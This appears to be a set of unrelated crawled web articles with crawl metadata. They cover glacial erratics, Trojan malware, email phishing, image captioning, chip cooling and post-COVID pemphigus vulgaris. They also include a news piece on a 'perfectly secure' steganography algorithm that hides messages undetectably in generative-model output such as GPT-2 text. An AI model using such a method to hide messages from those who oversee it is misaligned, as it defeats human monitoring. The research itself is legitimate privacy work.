What are glacial erratics and how are they formed? Glacial erratics are boulders found in glacial till or on the surface that were transported by glaciers and deposited in areas different from their original source. How do glaciers move these large rocks? As a glacier advances, it picks up rocks of various sizes; the rocks become incorporated into the ice and can be carried for hundreds of miles. When the glacier retreats or melts, the boulders are left behind, often sitting on top of the ground or embedded in glacial till, in places where they would not naturally occur.

Glacial erratics are a fascinating geological phenomenon that provides valuable insight into Earth's history and past glacial activity. These boulders can range in size from small pebbles to massive rocks, and they are typically made of rock types different from the bedrock of the surrounding area. Because of this, erratics provide valuable information about the extent of past glaciations, the direction of ice flow, and the composition of the rocks in the region from which they came. Scientists study erratics to reconstruct the movements of ancient glaciers and to understand how those powerful forces shaped the landscape over millions of years.
<urn:uuid:3e15671e-9f76-4812-b226-92477bc8b0f5>
CC-MAIN-2024-38
https://bsimm2.com/geography/glacial-erratics-a-geological-phenomenon.html
2024-09-17T07:39:30Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00124.warc.gz
en
0.953675
341
4.40625
4
Researchers claim to have created a "perfectly secure" way to pass hidden information in plain sight, and say their work could revolutionise social media and private messaging. The team, led by the University of Oxford in collaboration with Carnegie Mellon University, says it has achieved a breakthrough in secure communications by developing an algorithm that conceals sensitive information so effectively that it is impossible to detect that anything is hidden. The algorithm uses new advances in information theory to conceal one piece of content inside another in a way that cannot be detected, which may have substantial implications for information security, as well as further applications in data compression and storage. The team says this method may soon be used in digital human communications, including social media and private messaging. In particular, the ability to send perfectly secure information may empower vulnerable groups, including humanitarian workers.

"Our method can be applied to any software that automatically generates content," says co-lead author Dr Christian Schroeder de Witt of Oxford University's Department of Engineering Science. "For instance, probabilistic video filters or meme generators. This could be very valuable, for instance, for journalists and aid workers in countries where the act of encryption is illegal. However, users still need to exercise precaution as any encryption technique may be vulnerable to side-channel attacks such as detecting a steganography app on the user's phone."

The algorithm applies to a setting called steganography: the practice of hiding sensitive information inside of innocuous content. Steganography differs from cryptography because the sensitive information is concealed in such a way that obscures the fact that something has been hidden. The researchers say an example could be hiding a Shakespeare poem inside an AI-generated cat image.

New algorithm uses information theory

Despite having been studied for more than 25 years, existing steganography approaches generally have imperfect security, meaning that individuals who use these methods risk being detected. This is because previous steganography algorithms would subtly change the distribution of innocuous content. To overcome this, the research team used recent breakthroughs in information theory, specifically minimum entropy coupling, which allows one to join two distributions of data together such that their mutual information is maximised while the individual distributions are preserved. As a result, with the new algorithm, there is no statistical difference between the distribution of innocuous content and the distribution of content that encodes sensitive information.

The algorithm was tested using several models that produce auto-generated content, such as GPT-2, an open-source language model, and WAVE-RNN, a text-to-speech converter. Besides being perfectly secure, the new algorithm showed up to 40% higher encoding efficiency than previous steganography methods across various applications, enabling more information to be concealed within a given amount of data. This may make steganography an attractive method even if perfect security is not required, due to the benefits of data compression and storage. The research team has filed a patent for the algorithm but intends to issue it under a free licence to third parties for non-commercial responsible use. They will also present the new algorithm at the 2023 International Conference on Learning Representations in May.
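The paper itself is not reproduced here, but the core idea, hiding message bits in the sampling choices of a generative model without disturbing the model's output distribution, can be sketched in toy form. The Python below is an illustrative arithmetic-coding-style scheme over an invented three-token "model"; it is not the authors' minimum entropy coupling construction, and the vocabulary, probabilities, and parameters are made up for the example.

    VOCAB = ["cat", "dog", "bird"]   # toy stand-in for a generative model
    PROBS = [0.5, 0.3, 0.2]          # the model's next-token distribution

    def embed(bits, n_tokens):
        # Target the midpoint of the message's dyadic interval, then at
        # each step emit the token whose probability slice contains it.
        # n_tokens must shrink the interval below 2**-(len(bits) + 1);
        # with these PROBS, len(bits) + 1 steps are already enough.
        k = len(bits)
        r = (int("".join(map(str, bits)), 2) + 0.5) / 2 ** k
        lo, hi = 0.0, 1.0
        cover = []
        for _ in range(n_tokens):
            cum = lo
            for token, p in zip(VOCAB, PROBS):
                width = (hi - lo) * p
                if cum <= r < cum + width:
                    cover.append(token)
                    lo, hi = cum, cum + width
                    break
                cum += width
        return cover

    def extract(cover, k):
        # Replay the interval narrowing; once the interval is narrow
        # enough, the first k bits of lo are the hidden message.
        lo, hi = 0.0, 1.0
        for token in cover:
            cum = lo
            for t, p in zip(VOCAB, PROBS):
                width = (hi - lo) * p
                if t == token:
                    lo, hi = cum, cum + width
                    break
                cum += width
        return [int(b) for b in format(int(lo * 2 ** k), f"0{k}b")]

    message = [1, 0, 1, 1]
    cover_text = embed(message, n_tokens=8)
    assert extract(cover_text, k=len(message)) == message

When the hidden bits are uniformly random, each emitted token follows the model's own probabilities exactly, so an observer sees ordinary model output; making that guarantee hold optimally and in general is what the minimum entropy coupling machinery in the Oxford and Carnegie Mellon work provides.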
"The main contribution of the work is showing a deep connection between a problem called minimum entropy coupling and perfectly secure steganography," says co-lead author Samuel Sokota, of Carnegie Mellon University's Machine Learning Department. "By leveraging this connection, we introduce a new family of steganography algorithms that have perfect security guarantees."
<urn:uuid:99bc633e-7c54-427e-add7-aeae686149be>
CC-MAIN-2024-38
https://cybermagazine.com/articles/perfectly-secure-algorithm-could-aid-spread-of-free-speech
2024-09-19T18:37:27Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652055.62/warc/CC-MAIN-20240919162032-20240919192032-00824.warc.gz
en
0.926107
718
3.640625
4
A Trojan horse—also called a Trojan virus or simply a Trojan—is a type of malware that disguises itself as legitimate software. These files appear innocent or beneficial from the outside, but they execute harmful actions, from installing spyware to encrypting critical files, once users interact with them. Trojan horses accounted for at least six of the 11 most common malware strains in 2021, according to the Cybersecurity and Infrastructure Security Agency (CISA). In light of this threat, businesses should learn all they can about Trojans to stay safe.

What does a Trojan horse virus do?
Trojan horses deceive people into thinking they're harmless. Once a user installs or runs the application, it executes the hidden malware. Despite the moniker "Trojan virus," these programs aren't technically viruses. Whereas a virus can execute and replicate itself, a Trojan requires action from the user to run and spread. That's why they disguise themselves as legitimate programs people want to download and install. Once inside a system, Trojans can perform a wide range of attacks. Because of their deceiving nature, many cybercriminals use them to quietly spread spyware or ransomware behind the scenes. However, some Trojan strains immediately carry out more noticeable attacks when users run them.

5 types of Trojan horses
Trojans are a remarkably popular type of malware and can appear in forms as varied as backdoor Trojans, DDoS Trojans, downloaders, ransom Trojans, and rootkit Trojans.

1. Backdoor Trojans
A backdoor Trojan installs a backdoor on your computer once inside, granting cybercriminals remote access. Attackers often use them to create botnets, which carried out hundreds of thousands of attacks in 2022 alone.

2. DDoS Trojans
Distributed denial of service (DDoS) Trojans often overlap with backdoor Trojans. These malware strains take control of an infected computer to overload a website or network with requests as part of a DDoS attack.

3. Downloader Trojans
Downloader Trojans serve as the first step to larger attacks. Once users install these programs, the Trojan downloads other malicious software, much like how malvertising installs malware through seemingly innocuous ads. Some of these attacks just download adware, but cybercriminals also use them to spread more damaging software.

4. Ransom Trojans
Ransom Trojans are some of the most disruptive types. These slowly spread across users' devices, hindering performance or blocking critical data, demanding a ransom in return for undoing the damage.

5. Rootkit Trojans
A rootkit Trojan conceals itself or other malware so it can run malicious programs undetected for longer. They buy cybercriminals more time, enabling much larger, potentially damaging attacks.

Best practices to prevent Trojan horse viruses
Trojans can cause considerable damage, so businesses should try to prevent them as much as possible. Prevention starts with better credential management, as 90% of all cyberattacks originate from compromised usernames or passwords. Use multifactor authentication (MFA) and vary passwords between accounts to stop an attacker from infiltrating your account and installing a Trojan. User education is also important, as Trojans try to trick people into thinking they're harmless. Employees should know to never click on unsolicited links, download software from unverified sources, or open attachments from people they don't know.
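One simple layer of defense is to check an attachment's cryptographic hash against a list of known-bad samples before anyone opens it: a rough sketch of the scanning idea expanded on below. The blocklist entry here is a placeholder; real deployments would pull hashes from a threat-intelligence feed and combine this with full antivirus scanning, since hash matching only catches already-known samples.

    import hashlib
    from pathlib import Path

    # Placeholder blocklist of SHA-256 hashes of known Trojan samples.
    KNOWN_BAD_SHA256 = {"aa" * 32}

    # Extensions that commonly hide executables in email attachments.
    SUSPICIOUS_EXTENSIONS = {".exe", ".scr", ".js", ".vbs", ".bat", ".cmd"}

    def sha256_of(path: Path) -> str:
        digest = hashlib.sha256()
        with path.open("rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                digest.update(chunk)
        return digest.hexdigest()

    def scan_attachment(path: Path) -> str:
        if sha256_of(path) in KNOWN_BAD_SHA256:
            return "BLOCK: matches a known Trojan sample"
        if path.suffix.lower() in SUSPICIOUS_EXTENSIONS:
            return "WARN: executable attachment - verify the sender first"
        return "OK: no known signature matched (not proof of safety)"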
Scanning email attachments before clicking on them can also help identify Trojans before accidentally installing them. Users should avoid visiting potentially unsafe websites; stricter network administrator policies and security software can help with this by establishing blocklists and allowlists of certain sites. Ad blockers are another useful tool, as they can prevent Trojan attacks originating from malvertising.

How to detect and recover from Trojan attacks
Even with these preventive measures, businesses should never assume they won't experience a successful attack. Almost half of all small businesses have fallen victim to cyberattacks in the past year. A plan to detect and recover from successful Trojan attacks will mitigate their impact. Because Trojans operate behind the scenes, they're difficult to spot manually. Sudden performance changes or changing settings are telltale signs, but at that point, most of the damage is already done. The best way to detect Trojans is with anti-malware or antivirus software. Regular security scans can detect malicious code hidden within seemingly harmless files and alert you to the issue. You can then use this software to remove the infected programs safely. Be sure to keep anti-malware solutions updated to ensure they can detect changing attack vectors and new Trojan strains.

Trojans on phones and mobile devices
It's important to recognize that Trojans can impact mobile devices, too. Laptop and desktop computers are still the most common targets, but malware strains are also starting to affect phones and tablets. Trojans are the most common type of mobile malware, with downloader Trojans alone accounting for 26.28% of all threats. Many of these are apps, often pretending to be legitimate. Cybercriminals can also install Trojans on a mobile device through malicious links in text messages or emails. Users should only download apps from first-party stores to avoid downloading mobile Trojan horses. Similarly, you should avoid clicking links in unsolicited texts, emails, or messages from unknown sources. Using an anti-malware solution with support for mobile operating systems will also help.

Real-world examples of Trojan viruses
Whether mobile or otherwise, these threats are more than just theoretical. Trojan attacks have affected thousands, if not millions, of users, including several high-profile organizations. One of the most infamous Trojan examples is Emotet, which first emerged in 2014 as a banking Trojan, targeting users' accounts. It evolved to carry a wide range of different malware strains, leading to 16,000 alerts in 2020 as more cybercriminals embraced it. Zeus—also called Zbot—is another infamous Trojan. This malware strain gained notoriety in 2007 when it stole information from more than 1,000 computers belonging to the U.S. Department of Transportation. After infecting devices, the Trojan would log keystrokes to learn users' passwords, banking info, and more. The Rakhni Trojan first appeared in 2013 and became popular again in 2018 as its use cases expanded. Rakhni lets cybercriminals either infect targets' devices with ransomware or take control of them to mine cryptocurrency.

5 antivirus tools that prevent and detect Trojan horses
Reliable anti-malware tools are your best defense against Trojans. These five solutions represent some of the leading options for preventing, detecting, and removing Trojan viruses today.
1. Bitdefender Total Security
Bitdefender Total Security offers a comprehensive security platform, including a cloud-based malware scanner, phishing protection, and support for virtually all operating systems. This coverage helps prevent Trojan infections on any device. It's available both as a stripped-down free version and as a subscription starting at $39.99 per year for coverage of five devices.

2. Avast One
Avast One offers advanced malware scanning on all device types, including mobile endpoints. It also has anti-phishing and ransomware prevention features and has a free tier for users with smaller budgets, as well as individual and family plans starting at $4.19 per month for five devices.

3. Norton 360 Deluxe
Norton is the most popular provider of paid antivirus, and its 360 Deluxe platform is ideal for stopping Trojans. It uses machine learning to detect suspicious activity, helping it spot Trojans faster and more accurately. Norton offers a variety of subscription tiers, starting at $19.99 per year for a single device, or $49.99 per year for five devices.

4. McAfee Total Protection
McAfee Total Protection also uses AI to detect malware like Trojans. It has useful restoration features to recover stolen data and manage accounts in the event of a successful Trojan attack. It offers a basic, single-device subscription for $49.99 per year, or more advanced security starting at $64.99 per year for five devices.

5. Malwarebytes
Malwarebytes deserves mention as a free alternative to these paid anti-Trojan solutions. However, it requires you to manually start a scan instead of monitoring devices automatically. Since 85% of data breaches stem from human error, reliance on manual processes isn't ideal, but it is better than nothing. Malwarebytes also offers paid enterprise-level protection plans starting at $69.99 per device, per year—but you have to enroll at least 10 devices.

Bottom line: Protecting your organization from Trojan horses
Trojan horse viruses are some of the most pervasive and potentially difficult-to-spot threats facing companies today. However, the right approach can prevent and remove them effectively. You can stay safe when you know what these programs do, how they infect devices, and how you can address them.
<urn:uuid:136740f0-fb93-4e22-877b-0c00d0bc15ee>
CC-MAIN-2024-38
https://www.enterprisenetworkingplanet.com/security/what-is-a-trojan-virus/
2024-09-07T18:14:01Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00124.warc.gz
en
0.931445
1,879
3.28125
3
Automatically describing the content of an image is a fundamental problem in AI that connects computer vision and natural language processing. In a recent paper, Google presented a generative model based on a deep recurrent architecture that combines recent advances in computer vision and machine translation, and that can be used to generate natural sentences describing an image. Researchers at Stanford wrote in their abstract: "We present a model that generates free-form natural language descriptions of image regions. Our model leverages datasets of images and their sentence descriptions to learn about the inter-modal correspondences between text and visual data. Our approach is based on a novel combination of Convolutional Neural Networks over image regions, bidirectional Recurrent Neural Networks over sentences, and a structured objective that aligns the two modalities through a multimodal embedding."

Distinguished Scholar Geoff Hinton was asked in a recent Reddit Ask Me Anything session about how deep learning models might account for various elements and objects present in a single image. The closing lines of his response: "I guess we should just train [a recurrent neural network] to output a caption so that it can tell us what it thinks is there. Then maybe the philosophers and cognitive scientists will stop telling us what our nets cannot do."

"I consider the pixel data in images and video to be the dark matter of the Internet," said Fei-Fei Li, director of the Stanford Artificial Intelligence Laboratory, who led the research with Andrej Karpathy, a graduate student. "We are now starting to illuminate it."

This collaboration between Stanford and Google can possibly lead to more advanced object recognition systems with human-like understanding and prediction capabilities. It is also very promising for developing application models that can assess the entirety of scenes and deliver accurate image results and content libraries. Machine translation that powers Skype Translate and Google's word2vec libraries are among other advancements in language understanding propelled by recurrent neural networks.
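The basic encoder-decoder recipe both groups build on, a convolutional network that embeds the image feeding a recurrent network that emits the caption word by word, is compact enough to sketch. The PyTorch code below is a minimal illustration of that general architecture, not either paper's actual model; the backbone, dimensions, and vocabulary size are arbitrary choices for the example.

    import torch
    import torch.nn as nn
    import torchvision.models as models

    class Captioner(nn.Module):
        def __init__(self, vocab_size, embed_dim=256, hidden_dim=512):
            super().__init__()
            cnn = models.resnet18(weights=None)   # CNN image encoder
            cnn.fc = nn.Linear(cnn.fc.in_features, embed_dim)
            self.encoder = cnn
            self.embed = nn.Embedding(vocab_size, embed_dim)
            self.rnn = nn.LSTM(embed_dim, hidden_dim, batch_first=True)
            self.out = nn.Linear(hidden_dim, vocab_size)

        def forward(self, images, captions):
            # The image embedding acts as the first "word"; with teacher
            # forcing, the LSTM then predicts each next caption token.
            feats = self.encoder(images).unsqueeze(1)   # (B, 1, E)
            words = self.embed(captions[:, :-1])        # (B, T-1, E)
            states, _ = self.rnn(torch.cat([feats, words], dim=1))
            return self.out(states)                     # (B, T, vocab)

    model = Captioner(vocab_size=10000)
    images = torch.randn(2, 3, 224, 224)
    captions = torch.randint(0, 10000, (2, 12))
    logits = model(images, captions)   # train with cross-entropy vs captions

At inference time the same network is run step by step, feeding each sampled word back in until an end-of-sentence token appears.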
<urn:uuid:fe17953b-68db-4f23-94bb-1e00637b102f>
CC-MAIN-2024-38
https://dataconomy.com/2014/11/19/google-and-stanford-collaborate-to-build-neural-image-caption-generator/
2024-09-16T06:55:40Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00324.warc.gz
en
0.934792
415
2.703125
3
The average office worker receives over 120 emails per day. So much of our personal and professional communication these days is online, and you'll want to make sure you're safe while accessing your email account. Hackers have become increasingly savvy in recent years, and their attempts to access your information have become more sophisticated and covert. So can opening an email really get you hacked? Here's what you need to know.

The short answer is yes: there are some types of emails that can cause damage immediately upon opening, but if you know what to look for, you'll usually be able to avoid them. This typically happens when an email allows scripting, which allows the hacker to insert a virus or malware directly into the email.

The thing that puts you at the biggest risk of being hacked is opening an attachment in an email message. Hackers can hide viruses, ransomware, and other types of malware in these pieces of media. This malware can damage your systems and even compromise sensitive information like your passwords, bank account information, location, and more. Keep in mind that images are also attachments and can contain malware.

Clicking a link in an email from a hacker can also have serious consequences. These links can take you to a website that results in an involuntary malware download or some other form of digital tracking. These links can also take you to a site that mimics a popular social media platform or financial app. These sites will often trick you into providing your username and password for these platforms, which they can use to steal your identity.

You also put yourself at risk by replying to emails from people you don't know or trust. Hackers have gotten incredibly creative with phishing scams in recent years, and it can sometimes be difficult to tell what is a scam and what is real. These hackers will often pose as a person or organization in need of support and manipulate you into providing your personal information. More sophisticated hackers will often pose as a website or app that the recipient already interacts with on a regular basis. They then mislead you so you will provide your password, phone number, or other personal information. And this is just the data on phishing attacks – 92 percent of all malware is delivered via email.

Perpetrators have come up with a wide variety of strategies to gain access to online accounts. In fact, cybercrime went up significantly during the COVID-19 pandemic. With so many people working from home, email communication became even more important than it was previously. Many cybercriminals started sending out emails posing as the CDC or WHO with malicious attachments or links about current case numbers, vaccine information, and other information that would be relevant to the recipients. As email technology improves, hackers have learned to adapt quickly. It's unlikely that email attacks will go away anytime soon, which means that you will need to be vigilant to protect your personal data.

The consequences of an email attack can be very serious and aren't something to be ignored. Email hacks can quickly get out of control if you don't take action right away. The first thing that hackers will usually do is gain access to your email contacts. They will use this information to send scam emails to your contact list in an attempt to hack them as well. If you use the same passwords for your social media accounts as you do for your email, they may also gain access to these and start posting as you.
Through a suspicious email, the hacker can put malware on your computer or mobile device. This malware can track you and gain access to even more of your personal information. In particular, the malware will look for access to your bank account and credit cards, which they can use for identity theft. When hacking corporate accounts, they will also look for access to secure business information, which they could then use as part of a ransomware attack. An attack on your work computer or phone isn't just dangerous for you – it could also compromise the security of your entire company.

There are many different types of email attacks to watch out for; as technology has changed and security software has gotten better, cybercriminals have developed new strategies and new types of attacks. These are some of the most common.

Most people will receive phishing emails at some point, even if the attacks aren't successful. In a phishing email, the hacker will pretend to be a reputable organization or person. They will then use this unearned trust to manipulate the recipient into willingly sharing their personal information. When looking at a phishing email, there's usually some sign that the sender isn't who they claim to be – this could be an abnormal email address, uncharacteristic spelling mistakes, or links that seem out of place, for example. However, phishing attacks have become increasingly sophisticated in recent years as hackers have learned to better mimic reputable organizations and come up with new strategies. This is why it's so important to err on the side of caution with questionable emails.

There are some types of phishing attacks that you're more likely to encounter at work. Spear phishing is a specific type of attack where the sender will pretend to be someone inside your organization and use personal details to gain your trust. If you are in a C-suite position, you may also experience whaling, in which the hacker specifically targets high-level individuals.

A questionable email with attachments may contain spyware. Spyware is often hidden in attachments that contain legitimate software downloads, or in photo or video attachments that look harmless. Spyware puts trackers on your computer and sometimes in your web browser. These trackers monitor the websites you visit and the people you communicate with to find account passwords, credit card information, and more.

Adware is a specific type of malware that places unwanted ads on your computer or mobile device. In addition to being very irritating, these ads can install spyware to track your online activity. Adware is usually placed in spam emails. While many spam emails are harmless, they are a perfect vehicle for attacks because they contain so many links and photos.

Attachments in suspicious emails can also contain ransomware. Ransomware is a type of malware that will capture secure information from your computer and then demand money to give that information back. Cybercriminals often use ransomware to target organizations rather than individuals. This is because companies often have a large amount of secure customer information that is very valuable.

The best way to avoid getting hacked via email is just to use common sense and be cautious before opening any new email. When you get an email, check to make sure it is from someone you know and trust before clicking any links or opening any attachments. Beyond that, enable multi-factor authentication on your accounts, keep your devices and spam filters up to date, use reputable antivirus software, and never enter credentials on a page you reached from an email link.
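One classic phishing tell, a link whose visible text shows one domain while the underlying address points somewhere else, can even be checked automatically. The Python sketch below is an illustrative heuristic, not a complete filter; real mail security layers many such checks.

    import re
    from urllib.parse import urlparse

    LINK_RE = re.compile(
        r'<a[^>]+href="(?P<href>[^"]+)"[^>]*>(?P<text>.*?)</a>',
        re.IGNORECASE | re.DOTALL,
    )

    def domain(url: str) -> str:
        if "://" not in url:
            url = "http://" + url
        return urlparse(url).netloc.lower().removeprefix("www.")

    def suspicious_links(html: str) -> list[str]:
        findings = []
        for m in LINK_RE.finditer(html):
            text = m.group("text").strip()
            if "." not in text or " " in text:
                continue                    # anchor text isn't URL-like
            text_dom, href_dom = domain(text), domain(m.group("href"))
            if text_dom and text_dom != href_dom:
                findings.append(
                    f"text says {text_dom!r} but link goes to {href_dom!r}"
                )
        return findings

    html = '<a href="http://login-update.example/verify">paypal.com</a>'
    print(suspicious_links(html))   # flags the mismatched destination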
You won't necessarily notice if your email has been hacked right away. Common warning signs include messages in your sent folder that you didn't write, password-reset notifications you didn't request, login alerts from unfamiliar devices or locations, and contacts telling you they've received strange emails from your address. In general, just opening an email isn't going to get you hacked. However, clicking on links or attachments in an email can be very dangerous for you and your company. While exercising caution can help you avoid most email attacks, it's also very important to make sure you're using a reliable online security system to protect you even further.
<urn:uuid:39d25434-6132-45c6-a845-47ca2e6cfed5>
CC-MAIN-2024-38
https://parachute.cloud/can-opening-email-get-you-hacked/
2024-09-16T06:26:30Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00324.warc.gz
en
0.960721
1,498
2.984375
3
Researchers have developed a new type of cooling system for high-performance radars and supercomputers that circulates a liquid coolant directly into electronic chips through an intricate series of tiny microchannels. New advanced cooling technologies will be needed for high-performance electronics that contain three-dimensional stacks of processing chips instead of a single, flat-profile chip. Too much heat hinders the performance of electronic chips or damages the tiny circuitry, especially in small "hot spots."

"You can pack only so much computing power into a single chip, so stacking chips on top of each other is one way of increasing performance," said Justin A. Weibel, a research associate professor in Purdue's School of Mechanical Engineering and co-investigator on the project. "This presents a cooling challenge because if you have layers of many chips, normally each one of these would have its own system attached on top of it to draw out heat. As soon as you have even two chips stacked on top of each other the bottom one has to operate with significantly less power because it can't be cooled directly."

The solution is to create a cooling system that is embedded within the stack of chips. The work has been funded with a four-year grant issued in 2013 totaling around $2 million from the U.S. Defense Advanced Research Projects Agency (DARPA). New findings are detailed in a paper appearing on Oct. 12 in the International Journal of Heat and Mass Transfer.

"I think for the first time we have shown a proof of concept for embedded cooling for Department of Defense and potential commercial applications," said Suresh Garimella, professor of mechanical engineering at Purdue, who led the project. "This transformative approach has great promise for use in radar electronics, as well as in high-performance supercomputers. In this paper, we have demonstrated the technology and the unprecedented performance it provides."

A fundamental requirement stipulated by DARPA is the ability to handle chips generating a kilowatt of heat per square centimeter, more than 10 times greater than in conventional high-performance computers. "This number of 1,000 watts per square centimeter is sort of a Holy Grail of microcooling, and we've demonstrated this capability in a functioning system with an electrically insulated liquid," Garimella said.

Much of the integration and testing of the system was performed by Purdue doctoral student Kevin Drummond. Key to fabrication of the devices used in the demonstration were teams led by co-investigators David Janes, a professor of electrical and computer engineering, and Dimitrios Peroulis, a professor of electrical and computer engineering and Deputy Director of the Birck Nanotechnology Center in Purdue's Discovery Park. The team has presented preliminary findings in several conference papers during the course of the project. The researchers received a best paper award last year in the emerging technologies category at the IEEE-ITherm conference, and additional papers will be published, Garimella said.

The system uses a commercial refrigerant called HFE-7100, a dielectric, or electrically insulating, fluid, meaning it won't cause short circuits in the electronics. As the fluid circulates over the heat source, it boils inside the microchannels. "Allowing the liquid to boil dramatically increases how much heat can be removed, compared to simply heating a liquid to below its boiling point," he said. The team created an elaborate testing apparatus that simulates the heat generated by real devices.
An array of heaters and temperature sensors allows the researchers to test the system under a range of conditions, including the effects of hot spots. The testing system was fabricated at the Birck Nanotechnology Center.

The new approach improves efficiency by eliminating the need to attach cooling devices to chips. "Any time you are attaching heat sinks to the chip there are a lot of resistances and inefficiencies associated with that interface," Garimella said. This interfacial, or "parasitic," thermal resistance limits the performance of heat sinks. "We are going to a technology that eliminates those interfaces because the cooling is occurring inside the chips," Weibel said.

Using ultra-small channels allows for high performance. "It's been known for a long time that the smaller the channel the higher the heat-transfer performance," Drummond said. "We are going down to 15 or 10 microns in channel width, which is about 10 times smaller than what is typical for microchannel cooling technologies."

The new design solves one major obstacle to perfecting such systems: although ultra-small channels increase cooling performance, it is difficult to pump the required rates of liquid flow through them. The Purdue team overcame this problem by designing a system of short, parallel channels instead of long channels stretching across the entire length of the chip. A special "hierarchical" manifold distributes the flow of coolant through these channels. "So, instead of a channel being 5,000 microns in length, we shorten it to 250 microns long," Garimella said. "The total length of the channel is the same, but it is now fed in discrete segments, and this prevents major pressure drops. So this represents a different paradigm."

Peroulis and his students handled fabrication of the channels, a task made especially difficult by the need for "high aspect ratios," meaning the microscopic grooves are far deeper than they are wide. The channels were etched in silicon with a width of about 15 microns but a depth of up to 300 microns. "So, they are about 20 times as deep as they are wide, which is a non-trivial challenge from a fabrication perspective, particularly for repeatable and low-cost manufacturing processes," Peroulis said.

Janes and his students designed and built the intricate heating and sensing portions of the testing apparatus. "It is a complex task to be able to simulate the generation of hotspots and different heating scenarios while simultaneously having an accurate measure of the temperatures," Janes said. Other members of the team focused on computational models describing the physics of the cooling technology.

The new journal paper was authored by Drummond; doctoral student Doosan Back; Michael D. Sinanis, a manufacturing engineer and process development manager; Janes; Peroulis; Weibel; and Garimella. Although the team has recently completed the DARPA-funded project, the overall research is ongoing.
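To put the benefit of boiling in perspective, here is a rough back-of-the-envelope comparison of sensible heating versus boiling for a dielectric coolant. The property values are approximate, datasheet-style figures for HFE-7100, and the 20 K liquid temperature rise is an assumption chosen for illustration; neither comes from the paper itself.

```python
# Rough comparison of sensible vs. boiling (latent) heat removal for a
# dielectric coolant. Property values are approximate figures for HFE-7100
# and are assumptions for illustration, not numbers from the study.

CP = 1180.0     # specific heat of liquid HFE-7100, J/(kg*K), approximate
H_FG = 112e3    # latent heat of vaporization, J/kg, approximate
DELTA_T = 20.0  # assumed allowable liquid temperature rise, K

q_flux = 1000.0            # DARPA target heat flux, W/cm^2 (from the article)
area_cm2 = 1.0             # assumed chip area, cm^2
power = q_flux * area_cm2  # total heat load, W

sensible_per_kg = CP * DELTA_T  # J absorbed per kg by liquid heating alone
latent_per_kg = H_FG            # J absorbed per kg by boiling at saturation

print(f"Sensible heating absorbs ~{sensible_per_kg / 1e3:.1f} kJ/kg")
print(f"Boiling absorbs          ~{latent_per_kg / 1e3:.1f} kJ/kg")
print(f"Coolant flow needed, liquid only: {power / sensible_per_kg * 1e3:.0f} g/s")
print(f"Coolant flow needed, boiling:     {power / latent_per_kg * 1e3:.0f} g/s")
```

On these assumed numbers, boiling absorbs roughly five times more heat per kilogram of coolant than a 20 K liquid temperature rise, which is the quantitative intuition behind Garimella's remark about boiling; two-phase operation also holds the chip closer to a uniform saturation temperature.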
<urn:uuid:68da8158-3eae-4b80-986d-909df65292e4>
CC-MAIN-2024-38
https://debuglies.com/2017/10/24/researchers-have-developed-new-type-of-cooling-system-for-high-performance-radars-and-supercomputers/
2024-09-17T13:23:52Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00224.warc.gz
en
0.94766
1,381
3.546875
4
As of April 2023, the global impact of the coronavirus disease 2019 (COVID-19) pandemic is staggering, with over 676 million confirmed cases and more than 6.8 million deaths reported worldwide. Case severity has varied widely, and the pandemic has affected nearly every country in the world. This article delves into the intricate relationship between COVID-19 and autoimmune diseases, particularly Pemphigus Vulgaris (PV), shedding light on emerging cases and potential connections between the two.

The COVID-19 Pandemic Landscape

COVID-19, primarily transmitted through respiratory droplets and close contact, has exhibited fluctuating waves of infection, with spikes and subsequent drops over time. Factors such as population density, the availability of healthcare facilities, and public health measures have played crucial roles in determining the severity and impact of the pandemic.[2,3]

Autoimmune Diseases and COVID-19

Emerging evidence suggests that COVID-19 may influence the onset of autoimmune diseases, as highlighted by a systematic review linking COVID-19 to various autoimmune conditions.[4,5] Studies indicate that new-onset autoimmune disease may follow a COVID-19 diagnosis, with the severity of immune-related manifestations possibly correlating with the intensity of severe acute respiratory syndrome coronavirus 2 (SARS-CoV-2) infection. Autoantibodies found in COVID-19 patients further support the association between the infection and autoimmune diseases, indicating shared clinical manifestations, immune responses, and pathogenic mechanisms.[7,8]

Understanding Pemphigus Vulgaris

Pemphigus Vulgaris (PV) is a mucocutaneous autoimmune disease characterized by widespread bullae and ulceration on the skin and mucosa. The disease results from the production of autoantibodies against desmoglein-1 and desmoglein-3, leading to intraepithelial acantholysis and damage to the keratinocyte layer of the epithelium. Several risk factors, including genetics, drugs, viral infections, allergens, and psychological stress, have been identified as potential triggers for PV.[9,10]

Emerging Cases of Oral PV Post-COVID-19

This article focuses on emerging cases of oral PV following COVID-19 infection, highlighting the critical need to identify this life-threatening condition early in post-COVID-19 patients. Individuals with oral PV may experience impaired physiological function due to extensive ulceration and prolonged pain. The link between COVID-19 and oral PV is therefore a crucial area of exploration for healthcare professionals and researchers.

The emergence of oral pemphigus vulgaris in the aftermath of COVID-19 infection raises intriguing questions about the potential links between viral infections and the onset of autoimmune diseases. The presented case series, encompassing four individuals diagnosed with PV approximately one to five months after COVID-19 infection, underscores the need for a comprehensive understanding of the consequences of SARS-CoV-2 infection on the immune system and the subsequent development of autoimmune conditions.

COVID-19 and Oral Ulceration

The association between oral ulceration and COVID-19 infection remains complex and relatively uncharted territory.[12–14] The clinical manifestations of COVID-19, particularly in the oral cavity, can mimic those of various oral diseases, including autoimmune conditions.
Individuals with a history of autoimmune diseases, such as PV and oral lichen planus, may experience recurrent episodes and heightened severity of illness, as observed in the presented cases.

The Case Series

The case series, authored by Gunardi et al. and published in the Journal of Oral and Maxillofacial Pathology in July-September 2023, details the experiences of four patients who developed oral and skin lesions diagnosed as PV following a recent history of COVID-19 infection. The patients, aged between 33 and 57, demonstrated diverse clinical presentations and treatment responses.

Autoimmune Diseases and COVID-19

